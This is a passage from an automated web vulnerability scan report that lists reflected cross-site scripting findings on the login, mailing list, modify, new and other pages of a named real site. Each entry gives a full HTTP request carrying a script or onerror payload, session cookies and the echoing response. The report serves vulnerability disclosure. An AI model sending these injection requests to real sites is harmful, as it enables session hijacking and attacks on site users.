<input type="hidden" name="f" value="13988f\"><img src=a onerror=alert(1)>bdfb399a39b" />
...[SNIP]...

2.3934. http://www.resellerbase.com/login.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd812"><img%20src%3da%20onerror%3dalert(1)>533065831e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd812\"><img src=a onerror=alert(1)>533065831e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login.php?f=1&b=%2Fc/cd812"><img%20src%3da%20onerror%3dalert(1)>533065831e7p%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/c/cd812\"><img src=a onerror=alert(1)>533065831e7p/" />
...[SNIP]...

2.3935. http://www.resellerbase.com/login.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9135f<script>alert(1)</script>3fdcf8e38b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php9135f<script>alert(1)</script>3fdcf8e38b9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /login.php9135f<script>alert(1)</script>3fdcf8e38b9/ was not found on this server.</p>
...[SNIP]...

2.3936. http://www.resellerbase.com/mailing_list.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/mailing_list.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dcd48<script>alert(1)</script>f1aac486bf27b4c03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mailing_list.phpdcd48<script>alert(1)</script>f1aac486bf27b4c03?email=wiener@example.com&pflag=ml&act=unsubscribe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /mailing_list.phpdcd48<script>alert(1)</script>f1aac486bf27b4c03?email=wiener@example.com&pflag=ml&act=unsubscribe was not found on this server.</p>
...[SNIP]...

2.3937. http://www.resellerbase.com/mailing_list.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/mailing_list.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9f04<script>alert(1)</script>040cc9ffbe5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mailing_list.phpc9f04<script>alert(1)</script>040cc9ffbe5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /mailing_list.phpc9f04<script>alert(1)</script>040cc9ffbe5 was not found on this server.</p>
...[SNIP]...

2.3938. http://www.resellerbase.com/mailing_list.php [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/mailing_list.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cf1"><img%20src%3da%20onerror%3dalert(1)>cf38fb20dd62ba9ea was submitted in the email parameter. This input was echoed as 70cf1\"><img src=a onerror=alert(1)>cf38fb20dd62ba9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mailing_list.php?email=wiener@example.com70cf1"><img%20src%3da%20onerror%3dalert(1)>cf38fb20dd62ba9ea&pflag=ml&act=unsubscribe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mailing List</title>
...[SNIP]...
<input class="text3" type="text" name="email" size="30" value="wiener@example.com70cf1\"><img src=a onerror=alert(1)>cf38fb20dd62ba9ea" />
...[SNIP]...

2.3939. http://www.resellerbase.com/modify.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86ce5<script>alert(1)</script>cdda088ee8bec03cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php86ce5<script>alert(1)</script>cdda088ee8bec03cb?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.php86ce5<script>alert(1)</script>cdda088ee8bec03cb?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.3940. http://www.resellerbase.com/modify.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a938c<script>alert(1)</script>050f4435d80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modify.phpa938c<script>alert(1)</script>050f4435d80 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.phpa938c<script>alert(1)</script>050f4435d80 was not found on this server.</p>
...[SNIP]...

2.3941. http://www.resellerbase.com/modify.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 1208d<img%20src%3da%20onerror%3dalert(1)>9e4e936397135cd28 was submitted in the query parameter. This input was echoed as 1208d<img src=a onerror=alert(1)>9e4e936397135cd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.com1208d<img%20src%3da%20onerror%3dalert(1)>9e4e936397135cd28&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.3942. http://www.resellerbase.com/modify.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload 4b638</title><img%20src%3da%20onerror%3dalert(1)>65febdfbfb0c2a9a2 was submitted in the query parameter. This input was echoed as 4b638</title><img src=a onerror=alert(1)>65febdfbfb0c2a9a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.com4b638</title><img%20src%3da%20onerror%3dalert(1)>65febdfbfb0c2a9a2&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.com4b638</title><img src=a onerror=alert(1)>65febdfbfb0c2a9a2</title>
...[SNIP]...

2.3943. http://www.resellerbase.com/modify.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4109"><img%20src%3da%20onerror%3dalert(1)>57f7a1ae8fc2a93c5 was submitted in the query parameter. This input was echoed as c4109\"><img src=a onerror=alert(1)>57f7a1ae8fc2a93c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.comc4109"><img%20src%3da%20onerror%3dalert(1)>57f7a1ae8fc2a93c5&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.comc4109\"><img src=a onerror=alert(1)>57f7a1ae8fc2a93c5"
/>
...[SNIP]...

2.3944. http://www.resellerbase.com/modify.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 797f1<script>alert(1)</script>bb218c03032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modify.php797f1<script>alert(1)</script>bb218c03032/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.php797f1<script>alert(1)</script>bb218c03032/ was not found on this server.</p>
...[SNIP]...

2.3945. http://www.resellerbase.com/new.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/new.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47250<script>alert(1)</script>9a3ba435793 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new.php47250<script>alert(1)</script>9a3ba435793 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /new.php47250<script>alert(1)</script>9a3ba435793 was not found on this server.</p>
...[SNIP]...

2.3946. http://www.resellerbase.com/new.php [dt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/new.php

Issue detail

The value of the dt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 780d3"><img%20src%3da%20onerror%3dalert(1)>a199af09793 was submitted in the dt parameter. This input was echoed as 780d3\"><img src=a onerror=alert(1)>a199af09793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /new.php?st=cat&id=3&dt=1288843200780d3"><img%20src%3da%20onerror%3dalert(1)>a199af09793 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:24:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<a href="new.php?st=date&dt=1288843200780d3\"><img src=a onerror=alert(1)>a199af09793">
...[SNIP]...

2.3947. http://www.resellerbase.com/new.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/new.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6248b"><img%20src%3da%20onerror%3dalert(1)>e45522d26a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6248b\"><img src=a onerror=alert(1)>e45522d26a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /new.php?st=cat&id=3&dt=128884/6248b"><img%20src%3da%20onerror%3dalert(1)>e45522d26a63200 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<a href="new.php?st=date&dt=128884/6248b\"><img src=a onerror=alert(1)>e45522d26a63200">
...[SNIP]...

2.3948. http://www.resellerbase.com/other/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa0a<script>alert(1)</script>e95641f9909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other4aa0a<script>alert(1)</script>e95641f9909/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other4aa0a<script>alert(1)</script>e95641f9909/ was not found on this server.</p>
...[SNIP]...

2.3949. http://www.resellerbase.com/other/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9c232<script>alert(1)</script>25fcdf8e3df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/?9c232<script>alert(1)</script>25fcdf8e3df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/?9c232<script>alert(1)</script>25fcdf8e3df=1 was not found on this server.</p>
...[SNIP]...

2.3950. http://www.resellerbase.com/other/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/other/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 9877e<a>338d937379a was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f9877e<a>338d937379a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f9877e<a>338d937379a was not found on this server.</p>
...[SNIP]...

2.3951. http://www.resellerbase.com/other/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee441<script>alert(1)</script>84bd3d224f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otheree441<script>alert(1)</script>84bd3d224f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /otheree441<script>alert(1)</script>84bd3d224f5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3952. http://www.resellerbase.com/other/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1eaf<script>alert(1)</script>57028d27d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/search.phpb1eaf<script>alert(1)</script>57028d27d5f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
